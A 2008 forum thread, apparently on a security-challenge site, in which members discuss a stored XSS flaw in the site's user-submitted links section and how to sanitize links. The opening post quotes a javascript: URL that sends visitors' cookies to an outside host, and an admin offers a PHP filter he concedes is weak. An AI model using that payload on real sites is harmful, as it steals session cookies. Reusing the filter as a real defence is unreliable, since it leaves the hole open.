Links section
Global Rank: 170
Totalscore: 115575
Posts: 166
Thanks: 164
UpVotes: 121
Registered: 16y 217d
Last Seen: 1y 28d
The User is Offline
Links section
Apr 23, 2008 - 16:25:58 (16y 161d)
Apr 23, 2008 - 16:25:58 (16y 161d)
javascript:document.location="http://osmosis.ath.cx/~mals/mals/o.php?o="+document.cookie
Hmm, does not look good...
Hmm, does not look good...
Global Rank: 248
Totalscore: 87961
Posts: 1662
Thanks: 1350
UpVotes: 906
Registered: 16y 225d
Last Seen: 8h 1m
The User is Offline
Links section
Apr 23, 2008 - 16:48:03 (16y 161d)
Apr 23, 2008 - 16:48:03 (16y 161d)
Thanks for alerting us.
I deleted the harmful links.
Currently i have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for links section ?
@mals: Thanks for finding a real security problem
I deleted the harmful links.
Currently i have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for links section ?
@mals: Thanks for finding a real security problem
The geeks shall inherit the properties and methods of object earth.
Global Rank: 439
Totalscore: 55753
Posts: 34
Thanks: 39
UpVotes: 18
Registered: 16y 222d
Last Seen: 14y 209d
The User is Offline
Links section
Apr 23, 2008 - 17:09:46 (16y 161d)
Apr 23, 2008 - 17:09:46 (16y 161d)
Links should be validated by admins first.
Global Rank: 72
Totalscore: 213037
Posts: 148
Thanks: 206
UpVotes: 107
Registered: 16y 225d
Last Seen: 2y 196d
The User is Offline
Links section
Apr 23, 2008 - 19:48:57 (16y 161d)
Apr 23, 2008 - 19:48:57 (16y 161d)
I agree with theAnswer.
What's to stop people from adding tons of ad-links?
What's to stop people from adding tons of ad-links?
Global Rank: 248
Totalscore: 87961
Posts: 1662
Thanks: 1350
UpVotes: 906
Registered: 16y 225d
Last Seen: 8h 1m
The User is Offline
Links section
Apr 23, 2008 - 20:16:23 (16y 161d)
Apr 23, 2008 - 20:16:23 (16y 161d)
The amount of links you can add depends on your totalscore.
how about this snippet to prevent xss in links ?
My guess is that this would only make it slightly harder to exploit.
how about this snippet to prevent xss in links ?
GeSHi`ed Plaintext code
1
2
3
4
56
|
$url = str_replace("http://", "", $url);
if (strpos($url, "://") !== false) {
return htmlDisplayError("only valid links please.");
}
|
My guess is that this would only make it slightly harder to exploit.
The geeks shall inherit the properties and methods of object earth.
Global Rank: 29814
Totalscore: 0
Posts: 265
Thanks: 243
UpVotes: 180
Registered: 24y 308d
Last Seen: 1s
The User is Online
Links section
Apr 24, 2008 - 13:10:23 (16y 160d)
Apr 24, 2008 - 13:10:23 (16y 160d)
stop trying to be funny.
Global Rank: 170
Totalscore: 115575
Posts: 166
Thanks: 164
UpVotes: 121
Registered: 16y 217d
Last Seen: 1y 28d
The User is Offline
Links section
Apr 24, 2008 - 13:46:21 (16y 160d)
Apr 24, 2008 - 13:46:21 (16y 160d)
There are tons of solutions on the net, but this one looks short and good enough:
http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
Global Rank: 54
Totalscore: 255406
Posts: 155
Thanks: 131
UpVotes: 162
Registered: 16y 224d
Last Seen: 8d 11h
The User is Offline
Links section
Apr 24, 2008 - 15:50:04 (16y 160d)
Apr 24, 2008 - 15:50:04 (16y 160d)
Maybe checkout the W3C specification for URL. I bet u'll find a regex for it.
Global Rank: 170
Totalscore: 115575
Posts: 166
Thanks: 164
UpVotes: 121
Registered: 16y 217d
Last Seen: 1y 28d
The User is Offline
Links section
Apr 24, 2008 - 16:10:19 (16y 160d)
Apr 24, 2008 - 16:10:19 (16y 160d)
I think regex is not a good way, because nothing ensures that a valid url doesnt contain an evil payload. This statement is only theoretical, but true.
Lessons learned: preventing xss is a hard nut...
Lessons learned: preventing xss is a hard nut...
tunelko, quangntenemy, TheHiveMind, Z, balicocat, Ge0, samuraiblanco, arraez, jcquinterov, hophuocthinh, alfamen2, burhanudinn123, Ben_Dover, stephanduran89, braddie0, SwolloW, dangarbri, kalungmas have subscribed to this thread and receive emails on new posts.
1 people are watching the thread at the moment.
This thread has been viewed 2959 times.
1 people are watching the thread at the moment.
This thread has been viewed 2959 times.